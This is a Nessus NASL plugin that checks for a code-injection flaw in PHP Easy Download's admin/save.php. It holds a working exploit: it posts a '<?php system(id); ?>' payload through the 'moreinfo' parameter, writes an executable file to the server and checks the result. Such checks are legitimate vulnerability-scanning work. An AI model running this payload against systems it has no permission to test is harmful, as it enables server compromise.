# kst-gpl
#	
#	This script was written by Justin Seitz	<jms@bughunter.ca>
#	Per Justin : GPLv2
#


desc["english"] = "
Synopsis :

The remote web server contains a PHP script that is affected by a
remote code execution issue. 

Description:

The version of PHP Easy Download installed on the remote host fails to
sanitize input to the 'moreinfo' parameter before using it in the
'save.php' script.  By sending a specially-crafted value, an attacker
can store and execute code at the privilege level of the remote web
server. 

See also :

http://www.milw0rm.com/exploits/2812

Solution :

Unknown at this time.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";

if(description)
{
 
	# set script identifiers

	script_id(80076);;
	script_version("$Revision: 1.4 $");

        script_bugtraq_id(21179);

	name["english"] = "PHP Easy Download admin/save.php Paramater Code Injection Vulnerability";
	summary["english"] = "Tries to inject PHP code into remote web server.";
	family["english"] = "CGI abuses";

	script_name(english:name["english"]);
	script_description(english:desc["english"]);
	script_summary(english:summary["english"]);

	script_category(ACT_DESTRUCTIVE_ATTACK);
	script_copyright(english:"This script is Copyright (C) 2006 Justin Seitz");

	script_family(english:family["english"]);

	script_dependencies("http_version.nasl");
	script_require_ports("Services/www", 80);
	script_exclude_keys("Settings/disable_cgi_scanning");
	exit(0);
}



include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");

port = get_http_port(default:80);

#
#
#	Verify we can talk to the web server, if not exit
#
#

if(!get_port_state(port)) exit(0);
if(!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/easydownload","/phpeasydownload","/download", cgi_dirs());
else dirs = make_list(cgi_dirs());

#
#
#	Craft the PHP code to inject, we are going to execute the bash id command.
#
#

filename = string(SCRIPT_NAME,"-",unixtime(),".php");
cmd = "id";
code = urlencode(str:string('<?php system(', cmd, "); ?>"));

#
#
#	Now let's send the request to the script.
#
#
foreach dir (dirs) {

  url = string(dir,"/file_info/admin/save.php");
  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  if ("# of Accesses:" >< res) {
    data = string("description=0&moreinfo=",code,"&accesses=0&filename=",filename,"&date=&B1=Submit");
    attackreq = http_post(port:port, item:url, data:data);
    attackreq = ereg_replace(string:attackreq, pattern:"Content-Length: ", replace: string("Content-Type: application/x-www-form-urlencoded\r\nContent-Length: "));
    attackres = http_keepalive_send_recv(port:port,data:attackreq,bodyonly:TRUE);
    if (attackres == NULL) exit(0);

    #
    #
    #	Check the file we just uploaded for our random string we generated.
    #
    #
    http_check_remote_code(
      unique_dir:dir,
      check_request:string("/file_info/descriptions/",filename,".0"),
      check_result:"uid=[0-9]+.*gid=[0-9]+.*",
      command:"id",
      description:desc["english"],
      port:port
    );
  }
}
